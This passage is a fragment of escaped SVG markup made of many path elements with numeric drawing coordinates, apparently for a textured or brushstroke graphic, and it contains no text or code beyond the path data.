d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path 